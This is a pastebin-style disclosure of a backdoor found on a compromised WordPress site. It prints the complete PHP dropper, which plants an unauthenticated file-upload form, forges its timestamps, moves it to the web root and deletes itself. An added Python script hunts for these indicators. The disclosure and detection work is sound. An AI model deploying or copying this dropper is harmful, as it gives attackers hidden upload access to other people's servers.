frommhead.php

a guest
Dec 15th, 2014
/* Found suspicious backdoor that modifies wp-options.php in wp-admin directory, moves it to WordPress root, then removes itself. Placed by an unknown backdoor and sits silently for a request directly to frommhead.php.

Possible backdoors may be cmdshell files, maldet found these files in production:
wp-includes/js/thickbox/rvbt28.php
wp-includes/class-wp-xmlrpc.php
wp-content/themes/agentpress/mtgh.php

Backdoors may have been placed by one or more vulnerabilities. A couple to note that were found in production but not 100% certain which exploit was used:
http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html
http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html

Still seeking possible backdoors that have evaded maldet.
*/

<?php

$DEBUG_MODE=false;

// Creating wp-admin/wp-options.php (uploader)

$file_data_head ="<?php
if(isset(#_POST['Submit'])){
   #filedir = '';
   #maxfile = '2888888';

   #userfile_name = #_FILES['image']['name'];
   #userfile_tmp = #_FILES['image']['tmp_name'];
   if (isset(#_FILES['image']['name'])) {
       #abod = #filedir.#userfile_name;
       @move_uploaded_file(#userfile_tmp, #abod);

}
}
else{
echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>';
}
?>";

echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>";
if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) {
touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013));
        echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>";
} else {
        echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>";
}

$file = 'wp-optionstmp.php';
$newfile = '../wp-options.php';

echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>";
if (rename($file,$newfile)) {
touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013));
        echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>";
} else {
        echo"Proceeded: ".$start."/wp-options.php > Error!<br>";
}

$file='frommshead.php';

echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>";
touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013));
unlink($file);
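
A hunting script for the indicators visible in this sample, added here as an example and not part of the original paste: it flags the file names the dropper uses, the uploader's code pattern, and the fixed timestamp the dropper sets with touch(). The function names, the reason labels and the constructed demo tree are assumptions; the time check accepts 2013-12-31 12:17:11 in any time zone because the PHP server's zone cannot be read from the paste.

```python
import calendar, os, tempfile

# Indicators taken from the paste; the reason labels are an assumption of this example.
NAMES = {"wp-options.php", "wp-optionstmp.php", "frommhead.php", "frommshead.php"}
MARKERS = (b"@move_uploaded_file(", b"_FILES['image']")
# touch() argument in the dropper: mktime(12, 17, 11, 12, 31, 2013) = 2013-12-31 12:17:11
STAMP_UTC = calendar.timegm((2013, 12, 31, 12, 17, 11))

def stomped(mtime):
    """True if mtime is 2013-12-31 12:17:11 in any time zone (offsets step by 15 min)."""
    delta = int(mtime) - STAMP_UTC
    return abs(delta) <= 14 * 3600 and delta % 900 == 0

def scan(root):
    """Return {relative_path: [reasons]} for PHP files matching the paste's indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in (f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, name)
            reasons = []
            if name in NAMES:
                reasons.append("name")
            if stomped(os.stat(path).st_mtime):
                reasons.append("mtime")
            with open(path, "rb") as fh:
                data = fh.read(65536)
            if all(m in data for m in MARKERS):
                reasons.append("uploader")
            if reasons:
                hits[os.path.relpath(path, root)] = reasons
    return hits

def demo():
    """Build a constructed WordPress-like tree in a temp directory and scan it."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "wp-admin"))
    samples = {  # constructed: path -> (content, backdate like the dropper?)
        "wp-options.php": (b"<?php @move_uploaded_file($t, $n); $_FILES['image'];", True),
        "wp-admin/options.php": (b"<?php // core file name, benign", False),
        "wp-admin/about.php": (b"<?php // benign content, backdated", True),
    }
    for rel, (body, backdate) in samples.items():
        path = os.path.join(root, rel)
        with open(path, "wb") as fh:
            fh.write(body)
        if backdate:  # 12:17:11 local time as written by a UTC+2 server
            os.utime(path, (STAMP_UTC - 7200,) * 2)
    return scan(root)
```

touch() changes mtime but not the inode change time, so a file with this 2013 mtime and a recent ctime is a further sign of backdating.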